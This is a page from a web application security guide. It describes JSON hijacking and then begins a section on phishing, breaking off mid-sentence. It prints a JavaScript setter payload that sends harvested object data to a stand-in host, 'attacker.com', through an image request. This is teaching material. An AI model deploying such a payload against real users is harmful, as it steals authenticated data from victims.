Web application security - the fast guide 1.1

Chapter 5 - Attack Execution the client P a g e | 103 The victim opens the link that sends request to attacker website containing a page with the following script Object.prototype.__defineSetter__("name", function(x) { var s = ""; for (f in this) { s += f + ": '" + this[f] + "', "; } s += "name: " + x; // send information to the attacker's server document.images[0].src="http://attacker.com/?data=" + s; }); The previous listing will define a setter and enable the sending of the information requested by the browser to the attacker server. This attack will be valid if the user is authenticated through a cookie to the server containing the JSON service. 5.15 Attack Execute- Phishing BRAND Phishing go under the category of trickery type of attacks it depends mainly on faking a representation of website or impersonating the company through a mail message. Attacker usually uses the original company theme and logo images to convince the victim that the message is coming from legitimate company email. To avoid being caught the attacker uses a compromised machine and a forged email address. Attack requirement: A. vict

Web application security - the fast guide 1.1 | Page 103